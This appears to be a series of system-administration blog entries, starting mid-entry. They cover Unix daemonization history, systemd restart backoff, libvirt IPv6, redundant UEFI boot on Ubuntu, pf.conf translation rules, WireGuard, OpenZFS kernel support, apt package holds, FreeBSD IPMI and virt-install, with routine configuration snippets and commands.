As a whole system the overall System V init system was a significant improvement on the more basic BSD approach, but it (still) didn't have init itself doing any service supervision. In fact there was nothing that actively did service supervision even in the System V model. I'm not sure what the first system to do active service supervision was, but it may have been daemontools. Extending the init process itself to do daemon supervision has a somewhat controversial history; there are Unix systems that don't do this through PID 1, although doing a good job of it has clearly become one of the major jobs of the init system as a whole.

That init itself didn't do service or daemon management is, in my view, connected to the history of (process) daemonization. But that's another entry.

(There's also my entry on how init (and the init system as a whole) wound up as Unix's daemon manager.)

(Unix) daemonization turns out to be quite old

By: cks

In the Unix context, 'daemonization' means a program that totally detaches itself from how it was started. It was once very common and popular, but with modern init systems it's often no longer considered to be all that good an idea. I have some views on the history here, but today I'm going to confine myself to a much smaller subject, which is that in Unix, daemonization goes back much further than I expected. Some form of daemonization dates to Research Unix V5 or earlier, and an almost complete version appears in network daemons in 4.2 BSD.

As far back as Research Unix V5 (from 1974), /etc/rc is starting /etc/update (which does a periodic sync()) without explicitly backgrounding it. This is the giveaway sign that 'update' itself forks and exits in the parent, the initial version of daemonization, and indeed that's what we find in update.s (it wasn't yet a C program). The V6 update is still in assembler, but now the V6 update.s is clearly not just forking but also closing file descriptors 0, 1, and 2.

In the V7 /etc/rc, the new /etc/cron is also started without being explicitly put into the background. The V7 update.c seems to be a straight translation into C, but the V7 cron.c has a more elaborate version of daemonization. V7 cron forks, chdir's to /, does some odd things with standard input, output, and error, ignores some signals, and then starts doing cron things. This is pretty close to what you'd do in modern daemonization.

The first 'network daemons' appeared around the time of 4.2 BSD. The 4.2BSD /etc/rc explicitly backgrounds all of the r* daemons when it starts them, which in theory means they could have skipped having any daemonization code. In practice, rlogind.c, rshd.c, rexecd.c, and rwhod.c all have essentially identical code to do daemonization. The rlogind.c version is:

#ifndef DEBUG
	if (fork())
		exit(0);
	for (f = 0; f < 10; f++)
		(void) close(f);
	(void) open("/", 0);
	(void) dup2(0, 1);
	(void) dup2(0, 2);
	{ int tt = open("/dev/tty", 2);
	  if (tt > 0) {
		ioctl(tt, TIOCNOTTY, 0);
		close(tt);
	  }
	}
#endif

This forks with the parent exiting (detaching the child from the process hierarchy), then the child closes any (low-numbered) file descriptors it may have inherited, sets up non-working standard input, output, and error, and detaches itself from any controlling terminal before starting to do rlogind's real work. This is pretty close to the modern version of daemonization.

(Today, the ioctl() stuff is done by calling setsid() and you'd probably want to close more than the first ten file descriptors, although that's still a non-trivial problem.)
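
As a concrete illustration, here's a minimal sketch of the modern equivalent (my own, not taken from any particular program; error handling mostly omitted):

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* A minimal modern daemonization sketch. */
static void daemonize(void)
{
	if (fork() > 0)
		exit(0);	/* parent exits; child is re-parented to init */
	setsid();		/* new session, no controlling terminal */
	if (fork() > 0)
		exit(0);	/* no longer a session leader, so we can
				   never reacquire a controlling terminal */
	if (chdir("/") != 0)
		exit(1);
	int fd = open("/dev/null", O_RDWR);
	dup2(fd, 0);		/* standard input */
	dup2(fd, 1);		/* standard output */
	dup2(fd, 2);		/* standard error */
	if (fd > 2)
		close(fd);
}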

Resetting the backoff restart delay for a systemd service

By: cks

Suppose, not hypothetically, that your Linux machine is your DSL PPPoE gateway, and you run the PPPoE software through a simple script to invoke pppd that's run as a systemd .service unit. Pppd itself will exit if the link fails for some reason, but generally you want to automatically try to establish it again. One way to do this (the simple way) is to set the systemd unit to 'Restart=always', with a restart delay.

Things like pppd generally benefit from a certain amount of backoff in their restart attempts, rather than restarting either slowly or rapidly all of the time. If your PPP(oE) link just dropped out briefly because of a hiccup, you want it back right away, not in five or ten minutes, but if there's a significant problem with the link, retrying every second doesn't help (and it may trigger things in your service provider's systems). Systemd supports this sort of backoff if you set 'RestartSteps' and 'RestartMaxDelaySec' to appropriate values. So you could wind up with, for example:

Restart=always
RestartSec=1s
RestartSteps=10
RestartMaxDelaySec=10m

This works fine in general, but there is a problem lurking. Suppose that one day you have a long outage in your service but it comes back, and then a few stable days later you have a brief service blip. To your surprise, your PPPoE session is not immediately restarted the way you expect. What's happened is that systemd doesn't reset its backoff timing just because your service has been up for a while.

To see the current state of your unit's backoff, you want to look at its properties, specifically 'NRestarts' and especially 'RestartUSecNext', which is the delay systemd will put on for the next restart. You see these with 'systemctl show <unit>', or perhaps 'systemctl show -p NRestarts,RestartUSecNext <unit>'. To reset your unit's dynamic backoff time, you run 'systemctl reset-failed <unit>'; this is the same thing you may need to do if you restart a unit too fast and the start stalls.

(I don't know if manually restarting your service with 'systemctl restart <unit>' bumps up the restart count and the backoff time, the way it can cause you to run into (re)start limits.)

At the moment, simply doing 'systemctl reset-failed' doesn't seem to be enough to immediately re-activate a unit that is slumbering in a long restart delay. So the full scale, completely reliable version is probably 'systemctl stop <unit>; systemctl reset-failed <unit>; systemctl start <unit>'. I don't know how you see that a unit is currently in a 'RestartUSecNext' delay, or how much time is left on the delay (such a delay doesn't seem to be a 'job' that appears in 'systemctl list-jobs', and it's not a timer unit so it doesn't show up in 'systemctl list-timers').

If you feel like making your start script more complicated (and it runs as root), I believe that you could keep track of how long this invocation of the service has been running, and if it's long enough, run a 'systemctl reset-failed <unit>' before the script exits. This would (manually) reset the backoff counter if the service has been up for long enough, which is often what you really want.

(If systemd has a unit setting that will already do this, I was unable to spot it.)
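
If you do want to do this by hand, here is a sketch of such a wrapper; the unit name and the pppd invocation are both hypothetical:

#!/bin/sh
# Wrapper for a hypothetical 'pppoe.service': if this invocation of
# pppd ran for a decent while before exiting, assume the link was
# healthy and reset systemd's restart backoff.
start=$(date +%s)
/usr/sbin/pppd call dsl-provider nodetach   # however you invoke pppd
status=$?
if [ $(( $(date +%s) - start )) -ge 3600 ]; then
	systemctl reset-failed pppoe.service
fi
exit $status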

Options for adding IPv6 networking to your libvirt based virtual machines

By: cks

Recently, my home ISP switched me from an IPv6 /64 allocation to a /56 allocation, which means that now I can have a bunch of proper /64s for different purposes. I promptly celebrated this by, in part, extending IPv6 to my libvirt based virtual machine, which is on a bridged internal virtual network (cf). Libvirt provides three different ways to provide (public) IPv6 to such virtual machines, all of which will require you to edit your network XML (either inside the virt-manager GUI or directly with command line tools). The three ways aren't exclusive; you can use two of them or even all three at the same time, in which case your VMs will have two or three public IPv6 addresses (at least).

(None of this applies if you're directly bridging your virtual machines onto some physical network. In that case, whatever the physical network has set up for IPv6 is what your VMs will get.)
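
For the record, the network XML can be edited and the changes applied with virsh, assuming here that your network is the stock 'default' one; libvirt only applies XML changes when the network is restarted:

virsh net-edit default
virsh net-destroy default
virsh net-start default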

First, in all cases you're probably going to want an IPv6 '<ip>' block that sets the IPv6 address for your host machine and implicitly specifies your /64. This is an active requirement for two of the options, and typically looks like this:

<ip family='ipv6' address='2001:19XX:0:1102::1' prefix='64'>
[...]
</ip>

Here my desktop will have 2001:19XX:0:1102::1/64 as its address on the internal libvirt network.

The option that is probably the least hassle is to give static IPv6 addresses to your VMs. This is done with <host> elements inside a <dhcp> element (inside your IPv6 <ip>, which I'm not going to repeat):

<dhcp>
  <host name='hl-fedora-36' ip='2001:XXXX:0:1102::189'/>
</dhcp>

Unlike with IPv4, you can't identify VMs by their MAC address because, to quote the network XML documentation:

[...] The IPv6 host element differs slightly from that for IPv4: there is no mac attribute since a MAC address has no defined meaning in IPv6. [...]

Instead you probably need to identify your virtual machines by their (DHCP) hostname. Libvirt has another option for this but it's not really well documented and your virtual machine may not be set up with the necessary bits to use it.

The second least hassle option is to provide a DHCP dynamic range of IPv6 addresses. In the current Fedora 40 libvirt, this has the undocumented limitation that the range can't include more than 65,535 IPv6 addresses, so you can't cover the entire /64. Instead you wind up with something like this:

<dhcp>
  <range start='2001:XXXX:0:1102::1000' end='2001:XXXX:0:1102::ffff'/>
</dhcp>

Famously, not everything in the world does DHCP6; some things only do SLAAC, and in general SLAAC will allocate random IPv6 IPs across your entire /64. Libvirt uses dnsmasq (also) to provide IP addresses to virtual machines, and dnsmasq can do SLAAC (see the dnsmasq manual page). However, libvirt currently provides no directly exposed controls to turn this on; instead, you need to use a special libvirt network XML namespace to directly set up the option in the dnsmasq configuration file that libvirt will generate.

What you need looks like:

<network xmlns:dnsmasq='http://libvirt.org/schemas/network/dnsmasq/1.0'>
[...]
  <dnsmasq:options>
    <dnsmasq:option value='dhcp-range=2001:XXXX:0:1102::,slaac,64'/>
  </dnsmasq:options>
</network>

(The 'xmlns:dnsmasq=' bit is what you have to add to the normal <network> element.)

I believe that this may not require you to declare an IPv6 <ip> section at all, although I haven't tested that. In my environment I want both SLAAC and a static IPv6 address, and I'm happy to not have DHCP6 as such, since SLAAC will allocate a much wider and more varied range of IPv6 addresses.

(You can combine a dnsmasq SLAAC dhcp-range with a regular DHCP6 range, in which case SLAAC-capable IPv6 virtual machines will get an IP address from both, possibly along with a third static IPv6 address.)

PS: Remember to set firewall rules to restrict access to those public IPv6 addresses, unless you want your virtual machines fully exposed on IPv6 (when they're probably protected on IPv4 by virtue of being NAT'd).

Mostly getting redundant UEFI boot disks on modern Ubuntu (especially 24.04)

By: cks

When I wrote about how our primary goal for mirrored (system) disks is increased redundancy, including being able to reboot the system after the primary disk failed, vowhite asked in a comment if there was any trick to getting this working with UEFI. The answer is sort of, and it's mostly the same as you want to do with BIOS MBR booting.

In the Ubuntu installer, when you set up redundant system disks it's long been the case that you wanted to explicitly tell the installer to use the second disk as an additional boot device (in addition to setting up a software RAID mirror of the root filesystem across both disks). In the BIOS MBR world, this installed GRUB bootblocks on the disk; in the UEFI world, this causes the installer to set up an extra EFI System Partition (ESP) on the second drive and populate it with the same sort of things as the ESP on the first drive.

(The 'first' and the 'second' drive are not necessarily what you think they are, since the Ubuntu installer doesn't always present drives to you in their enumeration order.)

I believe that this dates from Ubuntu 22.04, when Ubuntu seems to have added support for multi-disk UEFI. Ubuntu will mount one of these ESPs (the one it considers the 'first') on /boot/efi, and as part of multi-disk UEFI support it will also arrange to update the other ESP. You can see what other disk Ubuntu expects to find this ESP on by looking at the debconf selection 'grub-efi/install_devices'. For perfectly sensible reasons this will identify disks by their disk IDs (as found in /dev/disk/by-id), and it normally lists both ESPs.

All of this is great but it leaves you with two problems if the disk with your primary ESP fails. The first is the question of whether your system's BIOS will automatically boot off the second ESP. I believe that UEFI firmware will often do this, and you can specifically set this up with EFI boot entries through things like efibootmgr (also); possibly current Ubuntu installers do this for you automatically if it seems necessary.

The bigger problem is the /boot/efi mount. If the primary disk fails, a mounted /boot/efi will start having disk IO errors and then if the system reboots, Ubuntu will probably be unable to find and mount /boot/efi from the now gone or error-prone primary disk. If this is a significant concern, I think you need to make the /boot/efi mount 'nofail' in /etc/fstab (per fstab(5)). Energetic people might want to go further and make it either 'noauto' so that it's not even mounted normally, or perhaps mark it as a systemd automounted filesystem with 'x-systemd.automount' (per systemd.mount).
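
As a sketch, the resulting fstab line might look like this (the UUID is made up):

UUID=ABCD-1234  /boot/efi  vfat  umask=0077,nofail  0  1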

(The disclaimer is that I don't know how Ubuntu will react if /boot/efi isn't mounted at all or is a systemd automount mountpoint. I think that GRUB updates will cope with having it not mounted at all.)

If any disk with an ESP on it fails and has to be replaced, you have to recreate a new ESP on that disk and then, I believe, run 'dpkg-reconfigure grub-efi-amd64', which will ask you to select the ESPs you want to be automatically updated. You may then need to manually run '/usr/lib/grub/grub-multi-install --target=x86_64-efi', which will populate the new ESP (or it may be automatically run through the reconfigure). I'm not sure about this because we haven't had any UEFI system disks fail yet.

(The ESP is a vfat formatted filesystem, which can be set up with mkfs.vfat, and has specific requirements for its GUIDs and so on, which you'll have to set up by hand in the partitioning tool of your choice or perhaps automatically by copying the partitioning of the surviving system disk to your new disk.)
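
A sketch of recreating an ESP on a replacement disk by hand (the device name and partition size are my assumptions):

# create a 512 MB EFI System Partition as partition 1 of /dev/sdb:
sgdisk -n 1:0:+512M -t 1:EF00 -c 1:"EFI System Partition" /dev/sdb
mkfs.vfat -F 32 /dev/sdb1
# then re-select the ESPs to update and repopulate the new one:
dpkg-reconfigure grub-efi-amd64
/usr/lib/grub/grub-multi-install --target=x86_64-efi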

If it was the primary disk that failed, you will probably want to update /etc/fstab to get /boot/efi from a place that still exists (probably with 'nofail' and perhaps with 'noauto'). This might be somewhat easy to overlook if the primary disk fails without the system rebooting, at which point you'd get an unpleasant surprise on the next system reboot.

The general difference between UEFI and BIOS MBR booting for this is that in BIOS MBR booting, there's no /boot/efi to cause problems and running 'grub-install' against your replacement disk is a lot easier than creating and setting up the ESP. As I found out, a properly set up BIOS MBR system also 'knows' in debconf what devices you have GRUB installed on, and you'll need to update this (probably with 'dpkg-reconfigure grub-pc') when you replace a system disk.

(We've been able to avoid this so far because in Ubuntu 20.04 and 22.04, 'grub-install' isn't run during GRUB package updates for BIOS MBR systems so no errors actually show up. If we install any 24.04 systems with BIOS MBR booting and they have system disk failures, we'll have to remember to deal with it.)

(See also my entry on multi-disk UEFI in Ubuntu 22.04, which goes deeper into some details. That entry was written before I knew that a 'grub-*/install_devices' setting of a software RAID array was actually an error on Ubuntu's part, although I'd still like GRUB's UEFI and BIOS MBR scripts to support it.)

Old (Unix) workstations and servers tended to boot in the same ways

By: cks

I somewhat recently read j. b. crawford's ipmi, where crawford talks in part about how old servers of the late 80s and 90s (Unix and otherwise) often had various features for management like serial consoles. What makes something an old school 80s and 90s Unix server and why they died off is an interesting topic I have views on, but today I want to mention and cover a much smaller one, which is that this sort of early boot environment and low level management system was generally also found on Unix workstations.

By and large, the various companies making both Unix servers and Unix workstations, such as Sun, SGI, and DEC, all used the same boot time system firmware on both workstation models and server models (presumably partly because that was usually easier and cheaper). Since most workstations also had serial ports, the general consequence of this was that you could set up a 'workstation' with a serial console if you wanted to. Some companies even sold the same core hardware as either a server or workstation depending on what additional options you put in it (and with appropriate additional hardware you could convert an old server into a relatively powerful workstation).

(The line between 'workstation' and 'server' was especially fuzzy for SGI hardware, where high end systems could be physically big enough to be found in definite server-sized boxes. Whether you considered these 'servers with very expensive graphics boards' or 'big workstations' could be a matter of perspective and how they were used.)

As far as the firmware was concerned, generally what distinguished a 'server' that would talk to its serial port to control booting and so on from a 'workstation' that had a graphical console of some sort was the presence of (working) graphics hardware. If the firmware saw a graphics board and no PROM boot variables had been set, it would assume the machine was a workstation; if there was no graphics hardware, you were a server.

As a side note, back in those days 'server' models were not necessarily rack-mountable and weren't always designed with the 'must be in a machine room to not deafen you' level of fans that modern servers tend to be found with. The larger servers were physically large and could require special power (and generate enough noise that you didn't want them around you), but the smaller 'server' models could look just like a desktop workstation (at least until you counted up how many SCSI disks were cabled to them).

Sidebar: An example of repurposing older servers as workstations

At one point, I worked with an environment that used DEC's MIPS-based DECstations. DEC's 5000/2xx series were available either as a server, without any graphics hardware, or as a workstation, with graphics hardware. At one point we replaced some servers with better ones; I think they would have been 5000/200s being replaced with 5000/240s. At the time I was using a DECstation 3100 as my system administrator workstation, so I successfully proposed taking one of the old 5000/200s, adding the basic colour graphics module, and making it my new workstation. It was a very nice upgrade.

OpenBSD versus FreeBSD pf.conf syntax for address translation rules

By: cks

I mentioned recently that we're looking at FreeBSD as a potential replacement for OpenBSD for our PF-based firewalls (for the reasons, see that entry). One of the things that will determine how likely we are to try this is how similar the pf.conf configuration syntax and semantics are between OpenBSD pf.conf (which all of our current firewall rulesets are obviously written in) and FreeBSD pf.conf (which we'd have to move them to). I've only done preliminary exploration of this but the news has been relatively good so far.

I've already found one significant syntax (and to some extent semantics) difference between the two PF ruleset dialects, which is that OpenBSD does BINAT, redirection, and other such things by means of rule modifiers; you write a 'pass' or a 'match' rule and add 'binat-to', 'nat-to', 'rdr-to', and so on modifiers to it. In FreeBSD PF, this must be done as standalone translation rules that take effect before your filtering rules. In OpenBSD PF, strategically placed (ie early) 'match' BINAT, NAT, and RDR rules have much the same effect as FreeBSD translation rules, causing your later filtering rules to see the translated addresses; however, 'pass quick' rules with translation modifiers combine filtering and translation into one thing, and there's not quite a FreeBSD equivalent.

That sounds abstract, so let's look at a somewhat hypothetical OpenBSD RDR rule:

pass in quick on $INT_IF proto {udp tcp} \
     from any to <old-DNS-IP> port = 53 \
     rdr-to <new-DNS-IP>

Here we want to redirect traffic to our deprecated old DNS resolver IP to the new DNS IP, but only DNS traffic.

In FreeBSD PF, the straightforward way would be two rules:

rdr on $INT_IF proto {udp tcp} \
    from any to <old-DNS-IP> port = 53 \
    -> <new-DNS-IP> port 53

pass in quick on $INT_IF proto {udp tcp} \
     from any to <new-DNS-IP> port = 53

In practice we would most likely already have the 'pass in' rule, and also you can write 'rdr pass' to immediately pass things and skip the filtering rules. However, 'rdr pass' is potentially dangerous because it skips all filtering. Do you have a single machine that is just hammering your DNS server through this redirection and you want to cut it off? You can't add a useful 'block in quick' rule for it if you have a 'rdr pass', because the 'pass' portion takes effect immediately. There are ways to work around this but they're not quite as straightforward.

(Probably this alone would push us to not using 'rdr pass'; there's also the potential confusion of passing traffic in two different sections of the pf.conf ruleset.)

Fortunately we have very few non-'match' translation rules. Turning OpenBSD 'match ... <whatever>-to <ip>' pf.conf rules into the equivalent FreeBSD '<whatever> ...' rules seems relatively mechanical. We'd have to make sure that the IP addresses our filtering rules saw continued to be the internal ones, but I think this would be work out naturally; our firewalls that do NAT and BINAT translation do it on their external interfaces, and we usually filter with 'pass in' rules.
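
To make the conversion concrete, a sketch with made-up macros; the OpenBSD version:

match out on $EXT_IF inet from $INT_NET nat-to $EXT_IP

and the FreeBSD translation-rule equivalent:

nat on $EXT_IF inet from $INT_NET to any -> $EXT_IP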

(There may be more subtle semantic differences between OpenBSD and FreeBSD pf rules. A careful side by side reading of the two pf.conf manual pages might turn these up, but I'm not sure I can read the two manual pages that carefully.)

Why my Fedora 40 systems stalled logins for ten seconds or so

By: cks

One of my peculiarities is that I reboot my Fedora 40 desktops by logging in as root on a text terminal and then running 'reboot' (sometimes or often also telling loginctl to terminate any remainders of my login session so that the reboot doesn't stall for irritating lengths of time). Recently, the simple process of logging in as root has been stalling for an alarmingly long time, enough to make me think something was wrong with the system (it turns out that the stall was probably ten seconds or so, but even a couple of seconds of stalled root login is alarming). Today I hit this again and this time I dug into what was happening, partly because I was able to reproduce it with something other than a root login to reboot the machine.

My first step was to use the excellent extrace to find out what was taking so long, since this can trace all programs run from one top level process and report how long they took (along with the command line arguments). This revealed that the time consuming command was '/usr/libexec/pk-command-not-found compinit -c', and it was being run as part of quite a lot of commands being executed during shell startup. Specifically, Bash, because on Fedora root's login shell is Bash. This was happening because Bash's normal setup will source everything from /etc/profile.d/ in order to set up your new (interactive) Bash setup, and it turns out that there's a lot there. Using 'bash -xl' I was able to determine that pk-command-not-found was probably being run somehow in /usr/share/lmod/lmod/init/bash. If you're as puzzled as I was about that, lmod (also) is apparently a system for setting up paths for accessing Lua 'modules', so it wants to hook into shell startup to set up its environment variables.

It took me a bit of time to understand how the bits fit together, partly because there's no documentation for pk-command-not-found. The first step is that Bash has a feature that allows you to hook into what happens when a command isn't found (cf, see the discussion of the (potential) command_not_found_handle function), and PackageKit is doing this (in the PackageKit-command-not-found Fedora RPM package, which Fedora installs as a standard feature). It turns out that Bash will invoke this handler function not just for commands you run interactively, but also commands that aren't found while Bash is sourcing all of your shell startup. This handler is being triggered in Lmod's init/bash code because said code attempts to run 'compinit -c' to set up completion in zsh so that it can modify zsh's function search path. Compinit is a zsh thing (it's not technically a builtin), so there is no exposed 'compinit' command on the system. Running compinit outside of zsh is a bug; in this case, an expensive bug.

My solution was to remove both PackageKit-command-not-found, because I don't want this slow 'command not found' handling in general, and also the Lmod package, because I don't use Lmod. Because I'm a certain sort of person, I filed Lmod issue #725 to report the issue.
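
(For anyone in the same situation, the removal is simply 'dnf remove PackageKit-command-not-found Lmod', using the package names above.)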

In some testing in a virtual machine, it appears that pk-command-not-found may be so slow only the first time it's invoked. This means that most people with these packages installed may not see or at least realize what's happening, because under normal circumstances they probably log in to Fedora machines graphically, at which point the login stall is hidden in the general graphical environment startup delay that everyone expects to be slow. I'm in the unusual circumstance that my login doesn't use any normal shell, so logging in as root is the first time my desktops will run Bash interactively and trigger pk-command-not-found.

(This elaborates on and cleans up a Fediverse thread I wrote as I poked around.)

I wish (Linux) WireGuard had a simple way to restrict peer public IPs

By: cks

WireGuard is an obvious tool to build encrypted, authenticated connections out of, over which you can run more or less any network service. For example, you might expose the rsync daemon only over a specific WireGuard interface, instead of running rsync over SSH. Unfortunately, if you want to use WireGuard as a SSH replacement in this fashion, it has one limitation; unlike SSH, there's no simple way to restrict the public IP address of a particular peer.

The rough equivalent of a WireGuard peer is a SSH keypair. In SSH, you can restrict where a keypair will be accepted from with the 'from="..."' restriction in your .ssh/authorized_keys. This provides an extra layer of protection against the key being compromised; not only does an attacker have to acquire the key, they have to be able to use it from exactly the same IP (or the expected IPs). However, more or less by design WireGuard doesn't have a particular restriction on where a WireGuard peer key can be used from. You can set an expected public IP for the peer, but if the peer contacts you from another IP, your (Linux kernel) WireGuard will update its idea of where the peer is. This is handy for WireGuard's usual usage cases but not what we necessarily want for a wired down connection where the IPs should never change.

(I don't think this is a technical restriction in the WireGuard protocol, just something not done in most or all implementations.)

The normal answer is firewall rules that restrict access to the WireGuard port, but this has two limitations. The first and lesser limitation is that it's external to WireGuard, so it's possible to have WireGuard active but your firewall rules not properly applied, theoretically allowing more access than you intend. The bigger limitation is that if you have more than one such wired down WireGuard peer, firewall rules can't tell which WireGuard peer key is being used by which external peer. So in a straightforward implementation of firewall rules, any peer public IP can impersonate any other (if it has the required WireGuard peer key), which is different from the SSH 'from="..."' situation, where each key is restricted separately.

(On the other hand, the firewall situation is better in one way in that you can't accidentally add a WireGuard peer that will be accepted from anywhere the way you can with a SSH key by forgetting to put in a 'from="..."' restriction.)

To get firewall rules that can tell peers apart, you need to use different listening ports for each peer on your end. Today, this requires different WireGuard interfaces (and probably different server keys) for each peer. I think you can probably give all of the interfaces the same internal IP to simplify your life, although I haven't tested this.
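
As a sketch of what the per-peer firewall rules might then look like with nftables (the table and chain are assumed to already exist, and the IPs and ports are invented for illustration):

# wg0 listens on 51820 and is only for peer A; wg1 on 51821, only for peer B
nft add rule inet filter input udp dport 51820 ip saddr 192.0.2.10 accept
nft add rule inet filter input udp dport 51821 ip saddr 198.51.100.20 accept
nft add rule inet filter input udp dport '{ 51820, 51821 }' drop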

(Having written this entry, I now wonder if it would be possible to write an nftables or iptables extension that hooked into the kernel side of WireGuard enough to know peer identities and let you match on them. Existing extensions are already able to be aware of various things like cgroup membership, and there's an existing extension for IPsec. Possibly you could do this with eBPF programs, since there's a BPF/eBPF iptables extension.)

The problems (Open)ZFS can have on new Linux kernel versions

By: cks

Every so often, someone out there is using a normal released version of OpenZFS on Linux (currently ZFS 2.2.6, which was just released) on a distribution that uses very new kernels (such as Fedora). They may then read that their version of ZFS (such as 2.2.5) doesn't list the latest kernel (such as 6.10) as a 'supported platform'. They may then wonder why this is so.

Part of the answer is that OpenZFS developers are cautious people who don't want to list new kernels as officially supported until people have carefully inspected and tested the situation. Even if everything looks good, it's possible that there is some subtle problem in the interface between (Open)ZFS and the new kernel version. But another part of the answer comes down to how the Linux kernel has no stable internal API, which is also part of how you can get subtle problems in new kernels.

The Linux kernel is constantly changing how things work internally. Functions appear or go away (or simply mutate); fields are added or removed from C structs, or sometimes change their meaning; function arguments change; how you're supposed to do things shifts. It's up to any out of tree code, such as OpenZFS, to keep up with these changes (and that's why you want kernel modules to be in the main Linux kernel if possible, because then other people do some of this work). So to merely compile on a new kernel version, OpenZFS may need to change its own code to match the kernel changes. Sometimes this will be simple, requiring almost no changes; other times it may lead to a bunch of modifications.

(Two examples are the master pull request for 6.10, which had only a few changes, and the larger master pull request for 6.11, which may not even be quite complete yet since 6.11 is not yet released.)

Having things compiling is merely the first step. The OpenZFS developers need to make sure that they're making the right changes, and they also generally want to check for things that have changed in ways that don't break compilation but do change behavior. To quote a message from Rob Norris on the ZFS on Linux mailing list:

"Support" here means that the people involved with the OpenZFS are reasonably certain that the traditional OpenZFS goals of stability, durability, etc will hold when used with that kernel version. That usually means the test suites have passed, there's no significant new issues reported, and at least three people have looked at the kernel changes, the matching OpenZFS changes, and thought very hard about it.

As a practical matter (as Rob Norris notes), this means that development versions of OpenZFS will often build and work on new kernel versions well before they're officially supported. Speaking from personal experience, it's possible to be using kernel versions that are not yet 'supported' without noticing until you hit an RPM version dependency surprise.
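
As a quick cross-check, an OpenZFS source tree records the officially supported kernel range in its top-level META file, so you can look before you build; the exact values below are what I'd expect for a 2.2.x release, but treat them as illustrative:

$ grep -E 'Linux-(Minimum|Maximum)' META
Linux-Minimum: 3.10
Linux-Maximum: 6.10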

How not to upgrade (some) held packages on Ubuntu (and Debian)

By: cks

We hold a number of packages across our Ubuntu fleet (for good reasons), so that they're only upgraded under controlled circumstances. Which packages are held varies, but they always include the kernel packages (among other things, we don't want machines to reboot into new kernels by surprise, for example after a crash or a power issue). Some of our hosts are used for testing, and I generally update their kernels (far) more often than those of our regular machines, for various reasons. Until recently I did this with the obvious 'apt-get' command line:

apt-get -u upgrade --with-new-pkgs --ignore-hold

The problem with this is that it upgrades all held packages, not just the kernel. I have historically gotten away with this on the machines I do it on, but recently I got burned (well, it burned my co-workers more); as part of a kernel upgrade I also upgraded another package, which caused some problems.

Instead what you (I) need to do is to use 'apt-mark unhold <packages>' and then just 'apt-get -u upgrade --with-new-pkgs'. This is less convenient (but at least these days we have apt-mark). I continue to be sad that 'apt-get upgrade' doesn't take package(s) to upgrade and will upgrade everything, so you can't do 'apt-get upgrade linux-image-*' to directly express what you (I) want here.
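
So in practice the sequence looks something like this (the package names here are just for illustration):

apt-mark unhold linux-image-generic linux-headers-generic
apt-get -u upgrade --with-new-pkgs
apt-mark hold linux-image-generic linux-headers-generic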

(Fedora's DNF will do this, along with the inverse option of 'dnf upgrade --exclude=...', and both of these are quite nice.)

You can do this with 'apt-get install', but if you're going to use wildcards in the package name for convenience, you need to be careful and add an extra option, --only-upgrade:

apt-get -u install --only-upgrade 'linux-*'

Otherwise, 'apt-get install ...' will faithfully do exactly what you told it to, which is install or upgrade all of the packages that match the wildcard. If you're using 'apt-get install' to upgrade held packages, you probably don't want that. Despite its name, the --only-upgrade option will install new packages that are required by the packages that you're upgrading, such as new kernel packages that are required by a new version of 'linux-image-generic'.

The one semi-virtue of explicitly unholding packages to upgrade them is that this makes it very obvious that the packages are in fact unheld. An 'apt-get install <packages>' or an 'apt-get upgrade --ignore-hold' will unhold the packages as a side effect. Fortunately we long ago modified our update system to automatically apply our standard package holds before it did anything else (after one too many accidents where we should have re-held a package but forgot).

(I'm sure you could write a cover script to handle all of this, if you wanted to. Currently I don't do this often enough to go that far.)

How to talk to a local IPMI under FreeBSD 14

By: cks

Much like Linux and OpenBSD, FreeBSD is able to talk to a local IPMI using the ipmi kernel driver (or device, if you prefer). This is imprecise although widely understood terminology; in more precise terms, FreeBSD can talk to a machine's BMC (Baseboard Management Controller) that implements the IPMI specification in various ways which you seem to normally not need to care about (for information on 'KCS' and 'SMIC', see the "System Interfaces" section of OpenBSD's ipmi(4)).

Unlike in OpenBSD (covered earlier), the stock FreeBSD 14 kernel appears to report no messages if your machine has an IPMI interface but the driver hasn't been enabled in the kernel. To see if your machine has an IPMI interface that FreeBSD can talk to, you can temporarily load the ipmi module with 'kldload ipmi'. If this succeeds, you will see kernel messages that might look like this:

ipmi0: <IPMI System Interface> port 0xca8,0xcac irq 10 on acpi0
ipmi0: KCS mode found at io 0xca8 on acpi
ipmi0: IPMI device rev. 1, firmware rev. 7.10, version 2.0, device support mask 0xdf
ipmi0: Number of channels 2
ipmi0: Attached watchdog
ipmi0: Establishing power cycle handler

(On the one Dell server I've tried this on so far, the ipmi(4) driver found the IPMI without any special parameters.)

At this point you should have a /dev/ipmi0 device and you can 'pkg install ipmitool' and talk to your IPMI. To make this permanent, you edit /boot/loader.conf to load the driver on boot, by adding:

ipmi_load="YES"

While you're there, you may also want to load the coretemp(4) module or perhaps amdtemp(4). After updating loader.conf, you need to reboot to make it take full effect, although since you can kldload everything before then I don't think there's a rush.

In FreeBSD, IPMI sensor information isn't visible in sysctl (although information from coretemp or amdtemp is). You'll need ipmitool or another suitable program to query it. You can also use ipmitool to configure the basics of the IPMI's networking and set the IPMI administrator's password to something you know, as opposed to whatever unique value the machine's vendor set it to, which you may or may not have convenient access to.
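
For example (the channel number, user ID, and address vary by hardware, so these are illustrative):

ipmitool sensor list
ipmitool lan print 1
ipmitool lan set 1 ipaddr 192.0.2.40
ipmitool user set password 2 'new-password-here'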

(As far as I can tell, ipmitool works the same on FreeBSD as it does on Linux, so if you have existing scripts and so on that use it for collecting data on your Linux hosts (as we do), they will probably be easy to make work on any FreeBSD machines you add.)

I used libvirt's 'virt-install' briefly and it worked nicely

By: cks

My normal way of using libvirt based virtual machines has been to initially create them in virt-manager using its convenient GUI, if necessary use virt-viewer to access their consoles, and use virsh for basic operations like starting and stopping VMs and rolling VMs back to snapshots, which I make heavy use of. Then recently I wrote about why and how I keep around spare virtual machines, and wound up discovering virt-install, which is supposed to let you easily create (and install) virtual machines from the command line. My first experience with it went well, so now I'm going to write myself some notes.

(I spun up a new virtual machine from scratch in order to poke at FreeBSD a bit.)

Due to having set up a number of VMs through virt-manager, I had already defined the network I wanted as well as a libvirt storage pool where the disks for the new virt-install VM could go. With those already existing, using virt-install was mostly a long list of arguments:

virt-install -n vmguest7 \
   --memory 8192 --vcpus 2 --cpu host \
   -c /virt/images/freebsd/FreeBSD-14.1-RELEASE-amd64-dvd1.iso \
   --osinfo freebsd14.0 \
   --disk size=20 --disk size=20 \
   -w network=netN-macvtap \
   --graphics spice --noautoconsole

(I think I should have used '--cpu host-passthrough' instead, because I think '--cpu host' caused virt-install to copy the host CPU features into the new VM instead of telling the new VM to just use whatever the host had.)

